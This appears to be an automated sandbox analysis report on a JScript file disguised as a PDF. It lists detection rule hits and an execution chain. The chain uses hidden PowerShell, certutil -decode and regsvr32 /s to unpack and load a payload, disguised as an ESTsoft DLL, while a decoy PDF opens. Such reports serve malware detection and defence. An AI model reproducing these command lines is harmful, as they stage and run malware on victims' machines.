Source: 00000000.00000002.562513728.0000027E9993D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.547005043.0000027E9B3CF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.547727779.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.534727641.0000027E99677000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.559503063.0000027E996A5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.551541440.0000027E9CD90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.559948938.0000027EB69DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.559831762.0000027E996A5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.539482612.0000027E99715000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.569744930.0000027E9B3E2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.534340935.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.546419483.0000027E9B3C6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000003.549235895.0000027E99939000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.540876716.0000027E9972A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.570828518.0000027E9CC69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000004.00000002.453777516.0000022E213DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000002.571040593.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000000.00000003.547572927.0000027E9993C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000004.00000002.452214006.0000022E20FF2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: Process Memory Space: wscript.exe PID: 7044, type: MEMORYSTR	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: Process Memory Space: regsvr32.exe PID: 2052, type: MEMORYSTR	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPED	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPED	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29

Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB72C0	13_2_00007FF983DB72C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB79B0	13_2_00007FF983DB79B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB7EB0	13_2_00007FF983DB7EB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DA84D0	13_2_00007FF983DA84D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D98320	13_2_00007FF983D98320
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD82F0	13_2_00007FF983DD82F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD22A4	13_2_00007FF983DD22A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DC6260	13_2_00007FF983DC6260
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB1160	13_2_00007FF983DB1160
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD1110	13_2_00007FF983DD1110
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D9A860	13_2_00007FF983D9A860
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DC676C	13_2_00007FF983DC676C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DBF76C	13_2_00007FF983DBF76C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB4750	13_2_00007FF983DB4750
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DCC714	13_2_00007FF983DCC714
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D99710	13_2_00007FF983D99710
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB66E0	13_2_00007FF983DB66E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD06F0	13_2_00007FF983DD06F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DC85A0	13_2_00007FF983DC85A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD7570	13_2_00007FF983DD7570
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DBF504	13_2_00007FF983DBF504
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD84FC	13_2_00007FF983DD84FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DDA4EC	13_2_00007FF983DDA4EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DC8CB0	13_2_00007FF983DC8CB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D9AB80	13_2_00007FF983D9AB80
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD2B3C	13_2_00007FF983DD2B3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DA0B30	13_2_00007FF983DA0B30
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D989D0	13_2_00007FF983D989D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB5990	13_2_00007FF983DB5990
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DA7940	13_2_00007FF983DA7940
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D96950	13_2_00007FF983D96950
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD48EC	13_2_00007FF983DD48EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D99080	13_2_00007FF983D99080
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D95050	13_2_00007FF983D95050
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DA7020	13_2_00007FF983DA7020
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D99FE0	13_2_00007FF983D99FE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DAAF60	13_2_00007FF983DAAF60
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB4EF0	13_2_00007FF983DB4EF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D9CEA0	13_2_00007FF983D9CEA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DCCEAC	13_2_00007FF983DCCEAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DDBE4C	13_2_00007FF983DDBE4C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DC8DD0	13_2_00007FF983DC8DD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DD6D08	13_2_00007FF983DD6D08
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983DB7CFE	13_2_00007FF983DB7CFE
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00007FF983D98D10	13_2_00007FF983D98D10
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D272C0	19_2_00007FF983D272C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D279B0	19_2_00007FF983D279B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D27EB0	19_2_00007FF983D27EB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D184D0	19_2_00007FF983D184D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D08320	19_2_00007FF983D08320
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D482F0	19_2_00007FF983D482F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D422A4	19_2_00007FF983D422A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D36260	19_2_00007FF983D36260
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D21160	19_2_00007FF983D21160
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D41110	19_2_00007FF983D41110
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D0A860	19_2_00007FF983D0A860
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D3676C	19_2_00007FF983D3676C
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D2F76C	19_2_00007FF983D2F76C
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D24750	19_2_00007FF983D24750
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D09710	19_2_00007FF983D09710
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D3C714	19_2_00007FF983D3C714
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D266E0	19_2_00007FF983D266E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D406F0	19_2_00007FF983D406F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D385A0	19_2_00007FF983D385A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D47570	19_2_00007FF983D47570
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D484FC	19_2_00007FF983D484FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D2F504	19_2_00007FF983D2F504
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D4A4EC	19_2_00007FF983D4A4EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D38CB0	19_2_00007FF983D38CB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D0AB80	19_2_00007FF983D0AB80
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D42B3C	19_2_00007FF983D42B3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D10B30	19_2_00007FF983D10B30
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D089D0	19_2_00007FF983D089D0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D25990	19_2_00007FF983D25990
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D17940	19_2_00007FF983D17940
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D06950	19_2_00007FF983D06950
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D448EC	19_2_00007FF983D448EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D09080	19_2_00007FF983D09080
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D17020	19_2_00007FF983D17020
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D05050	19_2_00007FF983D05050
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D09FE0	19_2_00007FF983D09FE0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D1AF60	19_2_00007FF983D1AF60
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D24EF0	19_2_00007FF983D24EF0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D0CEA0	19_2_00007FF983D0CEA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D3CEAC	19_2_00007FF983D3CEAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D4BE4C	19_2_00007FF983D4BE4C
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D38DD0	19_2_00007FF983D38DD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D27CFE	19_2_00007FF983D27CFE
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D46D08	19_2_00007FF983D46D08
Source: C:\Windows\System32\regsvr32.exe	Code function: 19_2_00007FF983D08D10	19_2_00007FF983D08D10

Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF983DE3108 appears 41 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF983D081A0 appears 101 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF983D981A0 appears 101 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF983D53108 appears 41 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF983D1B2F0 appears 136 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FF983DAB2F0 appears 136 times

Source: C:\Windows\System32\regsvr32.exe

Code function: 13_2_00007FF983DA0B30: GetVolumeInformationW,DeviceIoControl,CloseHandle,GetDriveTypeW,QueryDosDeviceW,SetupDiGetClassDevsW,SetupDiEnumDeviceInterfaces,SetupDiGetDeviceInterfaceDetailW,SetupDiGetDeviceInterfaceDetailW,DeviceIoControl,CloseHandle,SetupDiEnumDeviceInterfaces,SetupDiDestroyDeviceInfoList,CloseHandle,SetupDiDestroyDeviceInfoList,00007FF9AA922F90,

13_2_00007FF983DA0B30

Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll

Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Virustotal: Detection: 12%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
